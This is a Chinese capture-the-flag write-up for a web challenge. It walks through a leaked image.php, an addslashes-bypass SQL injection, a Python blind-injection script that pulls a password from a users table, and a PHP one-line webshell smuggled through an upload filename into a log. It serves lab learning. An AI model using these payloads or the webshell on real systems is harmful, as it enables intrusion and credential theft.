太久没打比赛,羊城杯被虐爆了,开始复健.
进入正题.
打开网页是登录框,随便输入账号密码,抓包,发现user.php.但是没有别的线索,扫下目录发现robots.txt.进入后发现可以下载备份文件,但是无法下载index.php,f12继续收集线索,图片那里有个image.php,尝试下载其备份,成功.
image.php:
<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
?>
看源码应该是sql注入.id和path处用addslashes函数做了处理.addslashes函数作用.之后又对id和path进行了过滤.结合前面的addslashes,绕过过滤:?id=\0'&path=or 1=1%23.其中id经过addslashes处理之后变为\\0\',过滤之后剩下\,所以查询语句变为select * from images where id='\' or path='or 1=1#',成功注入.接下来运行盲注脚本:
import requests
url = 'http://e4bad4d9-a501-4046-9b3d-ea44d661d6d5.node3.buuoj.cn/image.php'
flag = ''
for i in range(1,300):
print(i)
low = 32
high =128
mid = (low+high)//2
while(low<high):
payload = "?id=\\0'&path=or ascii(substr((select password from users),{},1))>{}%23".format(i,mid)
r = requests.get(url=url+payload)
if "JFIF" in r.text:
low = mid+1
else:
high = mid
mid =(low+high)//2
if(mid ==32 or mid ==127):
break
flag +=chr(mid)
print(flag)
(JFIF是抓image.php的包看到的.)
成功获取用户名和密码后,登录,一个文件上传界面.上传的东西会被放进日志里,将filename写为一句话木马,<?php不可用,使用短标签:<?=@eval($_POST['k']);?>蚁剑连接,flag在根目录.
No responses yet